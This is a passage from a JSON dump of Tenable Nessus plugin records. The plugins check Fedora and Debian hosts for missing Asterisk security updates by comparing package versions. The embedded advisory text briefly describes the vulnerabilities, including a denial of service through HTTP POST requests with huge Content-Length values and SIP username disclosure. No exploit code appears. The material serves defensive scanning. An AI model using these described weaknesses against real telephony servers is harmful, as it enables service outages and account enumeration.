script_name(english:\"Fedora 16 : asterisk-1.8.20.0-1.fc16 (2013-0992)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk Development Team has announced the release of Asterisk\n1.8.20.0. This release is available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 1.8.20.0 resolves several issues reported by\nthe community and would have not been possible without your\nparticipation. Thank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up\n under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue\n ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Improve Code Readability And Fix Setting natdetected\n Flag (Closes issue ASTERISK-20724. Reported by Michael\n L. Young)\n\n - --- Fix extension matching with the '-' char. (Closes\n issue ASTERISK-19205. Reported by Philippe Lindheimer,\n Birger 'WIMPy' Harzenetter)\n\n - --- Fix call files when astspooldir is relative. (Closes\n issue ASTERISK-20593. Reported by James Le Cuirot)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-1.8.20.\n0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-1.8.20.0\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ba8b1513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891649\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097815.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?66dfcde1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"asterisk-1.8.20.0-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:41:18", "description": "The Asterisk Development Team has announced the release of Asterisk 10.12.0. This release is available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 10.12.0 resolves several issues reported by the community and would have not been possible without your participation. 
Thank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Improve Code Readability And Fix Setting natdetected Flag (Closes issue ASTERISK-20724. Reported by Michael L. Young)\n\n - --- Fix extension matching with the '-' char. (Closes issue ASTERISK-19205. Reported by Philippe Lindheimer, Birger 'WIMPy' Harzenetter)\n\n - --- Fix call files when astspooldir is relative. (Closes issue ASTERISK-20593. Reported by James Le Cuirot)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-10.12.0\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "nessus", "title": "Fedora 17 : asterisk-10.12.0-1.fc17 (2013-0994)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2013-0994.NASL", "href": "https://www.tenable.com/plugins/nessus/64370", 
"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0994.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64370);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_xref(name:\"FEDORA\", value:\"2013-0994\");\n\n script_name(english:\"Fedora 17 : asterisk-10.12.0-1.fc17 (2013-0994)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk Development Team has announced the release of Asterisk\n10.12.0. This release is available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 10.12.0 resolves several issues reported by\nthe community and would have not been possible without your\nparticipation. Thank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up\n under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue\n ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Improve Code Readability And Fix Setting natdetected\n Flag (Closes issue ASTERISK-20724. Reported by Michael\n L. Young)\n\n - --- Fix extension matching with the '-' char. (Closes\n issue ASTERISK-19205. Reported by Philippe Lindheimer,\n Birger 'WIMPy' Harzenetter)\n\n - --- Fix call files when astspooldir is relative. (Closes\n issue ASTERISK-20593. 
Reported by James Le Cuirot)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-10.12.0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-10.12.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891649\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097762.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e754851\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"asterisk-10.12.0-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:41:44", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by the following vulnerabilities :\n\n - A stack-based buffer overflow error exists related to SIP, HTTP and XMPP handling over TCP. Note that in the case of 'Certified Asterisk', SIP is not affected. 
Further note that in the case of XMPP, an attacker must establish an authenticated session first. (CVE-2012-5976)\n\n - An error exists related to device state cache and anonymous calls that could allow system resources to be exhausted. Note this vulnerability only affects systems configured to allow anonymous calls. (CVE-2012-5977)", "cvss3": {}, "published": "2013-02-21T00:00:00", "type": "nessus", "title": "Asterisk Peer Multiple Vulnerabilities (AST-2012-014 / AST-2012-015)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*"], "id": "6690.PRM", "href": "https://www.tenable.com/plugins/nnm/6690", "sourceData": "Binary data 6690.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:36:43", "description": "Several vulnerabilities were discovered in Asterisk, a PBX and telephony toolkit, that allow remote attackers to perform denial of service attacks.", "cvss3": {}, "published": "2013-01-14T00:00:00", "type": "nessus", "title": "Debian DSA-2605-2 : asterisk - several issues", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2605.NASL", "href": "https://www.tenable.com/plugins/nessus/63511", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2605. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63511);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_bugtraq_id(57105, 57106);\n script_xref(name:\"DSA\", value:\"2605\");\n\n script_name(english:\"Debian DSA-2605-2 : asterisk - several issues\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Asterisk, a PBX and\ntelephony toolkit, that allow remote attackers to perform denial of\nservice attacks.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=698112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=698118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://packages.debian.org/source/squeeze/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2605\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 1:1.6.2.9-2+squeeze10.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"asterisk\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-config\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dbg\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dev\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-doc\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-h323\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-sounds-main\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:45:54", "description": "The Asterisk Development Team has announced security releases for Certified Asterisk 1.8.15 and Asterisk 1.8, 10, and 11. 
The available security releases are released as versions 1.8.15-cert2, 1.8.20.2, 10.12.2, 10.12.2-digiumphones, and 11.2.2.\n\nThese releases are available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following issues :\n\n - A possible buffer overflow during H.264 format negotiation. The format attribute resource for H.264 video performs an unsafe read against a media attribute when parsing the SDP.\n\n This vulnerability only affected Asterisk 11.\n\n - A denial of service exists in Asterisk's HTTP server.\n AST-2012-014, fixed in January of this year, contained a fix for Asterisk's HTTP server for a remotely-triggered crash. While the fix prevented the crash from being triggered, a denial of service vector still exists with that solution if an attacker sends one or more HTTP POST requests with very large Content-Length values.\n\n This vulnerability affects Certified Asterisk 1.8.15, Asterisk 1.8, 10, and 11\n\n - A potential username disclosure exists in the SIP channel driver. 
When authenticating a SIP request with alwaysauthreject enabled, allowguest disabled, and autocreatepeer disabled, Asterisk discloses whether a user exists for INVITE, SUBSCRIBE, and REGISTER transactions in multiple ways.\n\n This vulnerability affects Certified Asterisk 1.8.15, Asterisk 1.8, 10, and 11\n\nThese issues and their resolutions are described in the security advisories.\n\nFor more information about the details of these vulnerabilities, please read security advisories AST-2013-001, AST-2013-002, and AST-2013-003, which were released at the same time as this announcement.\n\nFor a full list of changes in the current releases, please see the ChangeLogs :\n\nhttp://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-1.8.15-cert2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-1.8.20.2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2-digiumphones http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.2.2\n\nThe security advisories are available at :\n\n - http://downloads.asterisk.org/pub/security/AST-2013-001.pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2013-002.pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2013-003.pdf\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "nessus", "title": "Fedora 17 : asterisk-10.12.2-1.fc17 (2013-4528)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2686"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2013-4528.NASL", "href": "https://www.tenable.com/plugins/nessus/65830", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-4528.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65830);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-2264\", \"CVE-2013-2686\");\n script_bugtraq_id(58756, 58764);\n script_xref(name:\"FEDORA\", value:\"2013-4528\");\n\n script_name(english:\"Fedora 17 : asterisk-10.12.2-1.fc17 (2013-4528)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk Development Team has announced security releases for\nCertified Asterisk 
1.8.15 and Asterisk 1.8, 10, and 11. The available\nsecurity releases are released as versions 1.8.15-cert2, 1.8.20.2,\n10.12.2, 10.12.2-digiumphones, and 11.2.2.\n\nThese releases are available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following issues :\n\n - A possible buffer overflow during H.264 format\n negotiation. The format attribute resource for H.264\n video performs an unsafe read against a media attribute\n when parsing the SDP.\n\n This vulnerability only affected Asterisk 11.\n\n - A denial of service exists in Asterisk's HTTP server.\n AST-2012-014, fixed in January of this year, contained a\n fix for Asterisk's HTTP server for a remotely-triggered\n crash. While the fix prevented the crash from being\n triggered, a denial of service vector still exists with\n that solution if an attacker sends one or more HTTP POST\n requests with very large Content-Length values.\n\n This vulnerability affects Certified Asterisk 1.8.15,\n Asterisk 1.8, 10, and 11\n\n - A potential username disclosure exists in the SIP\n channel driver. 
When authenticating a SIP request with\n alwaysauthreject enabled, allowguest disabled, and\n autocreatepeer disabled, Asterisk discloses whether a\n user exists for INVITE, SUBSCRIBE, and REGISTER\n transactions in multiple ways.\n\n This vulnerability affects Certified Asterisk 1.8.15,\n Asterisk 1.8, 10, and 11\n\nThese issues and their resolutions are described in the security\nadvisories.\n\nFor more information about the details of these vulnerabilities,\nplease read security advisories AST-2013-001, AST-2013-002, and\nAST-2013-003, which were released at the same time as this\nannouncement.\n\nFor a full list of changes in the current releases, please see the\nChangeLogs :\n\nhttp://downloads.asterisk.org/pub/telephony/certified-asterisk/release\ns/ChangeLog-1.8.15-cert2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-1.8.20.2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-10.12.2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-10.12.2-digiumphones\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-11.2.2\n\nThe security advisories are available at :\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-001.\n pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-00\n 2.pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-00\n 3.pdf\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-001.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-002.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-003.pdf\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/releases/\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-1.8.20.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?29e5303b\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4695ab6\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2-digiumphones\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05ab7e1a\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.2.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?16e35cb0\"\n );\n # http://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-1.8.15-cert2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d97a0e84\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=928774\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=928777\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-April/101684.html\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e95e6b29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 